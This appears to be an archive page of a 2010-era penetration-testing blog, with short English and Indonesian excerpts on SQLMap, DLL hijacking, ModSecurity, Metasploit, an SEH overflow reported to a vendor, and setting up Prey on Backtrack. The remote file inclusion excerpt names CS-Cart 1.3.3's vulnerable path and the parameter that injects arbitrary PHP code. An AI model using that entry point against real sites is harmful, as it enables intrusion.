Skip to content

Posts by t0m

2
Sep

How to: SQLMap (dump and destroy)

SQLMap is the tool to automate SQL Injection vulnerability exploitation. This tool is very popular to exploit the SQL Injection vulnerability. While most of kiddies knew about this tool to gather information and retrieves the tables information, i try to share this information about the powerful of SQLMap rather than just as “a database dumper tool”.

I will separate this in 3 section, as a fingerprinter (we already knew this), as an enumerator (of course), and as a destroyer (hmm..?!). Check it out. Read moreRead more

28
Aug

Bahaya Eksploitasi Terhadap DLL

Eksploitasi terhadap DLL (Dynamic-Link Library) saat ini di ambang ke khawatiran. Hampir seluruh aplikasi yang sehari-hari digunakan untuk produktifitas ataupun hanya sekedar untuk hiburan memiliki kelemahan terhadap DLL Hijacking. Kelemahan ini pertama kali ditemukan oleh tim ACROS security yang mem-posting di Bugtraq bahwa mereka dapat melakukan load DLL tambahan (malicious) yang dibutuhkan program iTunes. Hasilnya, iTunes akan “membawa” malicious DLL tersebut dan hacker dapat mengeksekusi perintah pada sistem.

Temuan ini memicu para penggiat keamanan di seluruh dunia untuk mencari aplikasi lain yang dapat di eksploitasi. Tim dari Offensive Security dan CoreLan Team membuat sebuah list (tidak resmi) aplikasi / program / software yang memiliki kelemahan (bermasalah) terhadap DLL Hijacking ini. Beberapa program eksploitasi otomatis seperti Metasploit dan Social Engineering Toolkit bahkan telah memasukkan modul untuk mengeksploitasi kelemahan DLL ini. Jenis serangan yang akan terjadi karena kelemahan ini biasanya mengincar sisi klien atau biasa dikenal dengan nama Client-side Attack.

Microsoft telah memberikan respon secepatnya untuk penanganan kelemahan tersebut, silakan lihat pada website Microsoft berikut:

  1. Microsoft Security Advisory (2269637)
  2. A new CWDIllegalInDllSearch registry entry is available to control the DLL search path algorithm

Sumber: Rapid7 Network Security Blog, Exploit Database, Microsoft

13
Aug

OWASP ModSecurity Core Rule Set

ModSecurity is a good starting point to secure your web site. OWASP provides the core rule set (CRS) for ModSecurity rules against the most critical web application attack.

From OWASP:

ModSecurity is an Apache web server module that provides a web application firewall engine. The ModSecurity Rules Language engine is extrememly flexible and robust and has been referred to as the “Swiss Army Knife of web application firewalls.”

In order to enable users to take full advantage of ModSecurity out of the box, we have developed the Core Rule Set (CRS) which provides critical protections against attacks across most every web architecture.

Check OWASP Core Rule Set home page for more info.

Download here

6
Aug

Backtrack 4 R1 is released to Public

Backtrack 4 R1 is now released to Public.
Find out here.

*This version seems larger than the previous.

10
Jul

Batch Audio Converter <=v.1.0.0 Stack Overflow (SEH)

Iseng-iseng nyari aplikasi yang bisa diotak-atik buat maenan SEH, dapet juga aplikasi Batch Audio Converter <= v.0.4.0.0 dan berhasil di eksploitasi dengan sukses melalui SEH Overflow (tulisan mengenai SEH secara jelas bisa dilihat di situs Peter Van Eeckhoutte dan situs underground Indonesia tertua, Kecoak Elektronik). Ngeliat versi dari aplikasinya, saya liat di Help/About pada aplikasi tersebut dan mengunjungi situs pembuatnya. Pembuatnya adalah Freewaretoolbox, langsung aja saya download versi terakhir, yaitu versi 1.0.0 dan ternyata masih kena juga dengan buffer overflow.

Saya langsung kirim email ke pembuatnya untuk segera diperbaiki karena kalau dilihat, aplikasi ini sangat umum dipakai karena beberapa dari pengguna internet sering melakukan konversi dari format mp3 ke format wav atau ke format yang lain. Read moreRead more

27
May

Nessus access from Android 2.2

While Android 2.2 (code name Froyo – frozen yogurt, released last week on Google I/O May 19-20, 2010) is now support Flash, we can now grab remote Nessus server (which is using flash since version 4.2) while on mobile.

Nessus on Android 2.2

This also make the mobile pentesting is more powerful. TheAluc on his twitter is researching how to make a possible Android Mobile Hacking. Well, in the near future, pentesters won’t bring their laptop to the cafe or office, they just bring the Android phone :D

*TheAluc also make the “impossible Ruby – Metasploit porting” on Android – Nexus One.

Metasploit on Android

The Redmine Interface Project on Metasploit is also working on jRuby to make Metasploit portable more stable.

24
May

Metasploit 3.4.0 Released

Metasploit 3.4.0 is released to public. Check the Release Notes or directly go to Download.

21
May

PHP include exploitation with Metasploit

Metasploit support for PHP Include exploitation, or simply known as RFI (Remote File Inclusion). I will show you how this work on CS-Cart 1.3.3 which vulnerable to remote file inclusion.

The vulnerable path is at classes/phpmailer/class.cs_phpmailer.php?classes_dir=[include arbitrary php code]

so in Metasploit, the PHPURI PATH will be like this:

classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX

let see how this exploitation works. Read moreRead more

17
May

Setting Up Prey on Back|Track 4

Did you know that Backt|Track 4 include Prey on their installation?
If you don’t, let setup this tracker device application.

First, you should check whether the prey installation exist or not. Try looking on /usr/share/prey, if they’re on its place, it’s ok now to configure this application.

Create account on your Prey Control Panel at Preyproject <http://preyproject.com>. Once it created, add your device and check your API and Device key (both are in the Control Panel and Profile page).

Go to /usr/share/prey/config and add your API Key and Device Key. Setup your email notification on your needs and Prey is ready to go.

Run Prey to make sure it’s sync all info to Prey websites.

root@bt:~# /usr/share/prey/prey.sh

 ### PREY 0.3.73 spreads its wings!
 ### Linux bt 2.6.30.9 #1 SMP Tue Dec 1 21:51:08 EST 2009 i686 GNU/Linux

 – Looking for connection…
 – Got network connection!
 – Checking URL…
 – Got XML. Parsing…

 >> Reading configuration…

 – Delay in sync.

 >> Verifying status…

 – Got status code 200!
 – Nothing to worry about. :)

root@bt:~# 

If the result is the same as above, you’re good. Back|Track 4 already place prey to sync every 20 minutes.

2
May

Penetration testing Real world mode by Offsec

A video about Penetration testing in the real world, enjoy the video from Offensive Security.
It cannot be embedded, so better view on their website.

The video is here:

http://www.offensive-security.com/videos/penetration-testing-in-the-real-world/

Enjoy!

« Older Entries
Rss Feed Tweeter button Facebook button Linkedin button Stumbleupon button